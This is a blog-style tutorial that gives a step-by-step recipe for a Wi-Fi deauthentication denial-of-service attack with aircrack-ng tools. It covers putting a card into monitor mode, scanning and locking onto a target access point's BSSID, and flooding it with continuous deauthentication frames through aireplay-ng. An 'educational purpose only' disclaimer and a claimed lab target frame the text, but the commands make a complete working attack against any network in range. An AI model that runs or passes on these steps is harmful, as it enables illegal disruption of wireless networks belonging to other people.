(Step by Step) DoS attack on Router (Wireless Network Wifi)

Prepared by : Amit Giri

Disclaimer : Extremely only for educational purpose. (In this tutorial, I will show how the DoS attack can be performed step-by-step. This tutorial is only for education purpose, all the demonstrations performed in our own lab. Use at your own risk!!)

Title : DoS attack on Router (Wireless Network Wifi)

Step1: Find WiFi Interface Card

Check the name of your wifi interface card (wlan0/1/2...). Open the terminal window in (Kali)Linux system and type the following command:-

sudo iwconfig

Choose one to put into monitor mode. In my case, "wlan1" is my wifi card or interface name to be operating in monitor mode.


Step2: Kill Processes

Some processes need to kill before putting the card in monitor mode because that could cause trouble. Type the following command:-

sudo airmon-ng check kill


Step3: Enable Monitor Mode

Put your WiFi card in Monitor Mode. Type the following command:-

sudo airmon-ng start wlan1

//Here "wlan1" is my wifi card, choose your own and replace it with your own wifi card (wlan0, wlan1, wlan2...).


Step4: Scan WiFi Networks

In this step, I'm going to scan Wifi networks available in my range. Type the following command:-

sudo airodump-ng [name of your wireless interface]

//Here "wlan1" is the name of my wifi card. After putting the card into monitor mode "wlan1" is converted into "wlan1mon" but In my case, "wlan1" is the name of my wireless card as well as monitor mode interface. In other cases, you can have "wlan1mon".


Here you can see all the wifi networks available in my range. After you find the target you wanna perform DoS Press Ctrl+c to stop scanning the wifi networks. 


Step5: Lock The Target

Each WiFi network has a channel number and unique bssid(mac address of the router). In the step, I'm going to lock the target which I'm gonna perform a DoS attack. I choose "Test BuZz" as my target which is an access point I have configured for testing purposes. Type the following command:-

sudo airodump-ng --bssid [BSSID] -c [channel_number] [name of wireless interface]

// eg: sudo airodump-ng --bssid (target bssid value) -c 11 wlan1


As you can see the target has been locked.


Now let's perform the DoS attack.

Step6: Attack Begin

This is the final step where you can perform the DoS attack to the target you want. Open another terminal window and type the following command:-

sudo aireplay-ng --deauth 0 -a [BSSID] [name of the wireless inteface]

//Here, zero(0) is represents a deathentication attack and -a is the bssid of the wifi. eg: sudo aireplay-ng --deauth 0 -a (target bssid here) wlan1


As you can see, We can successfully perform a DoS attack on the targeted WiFi network.



Comments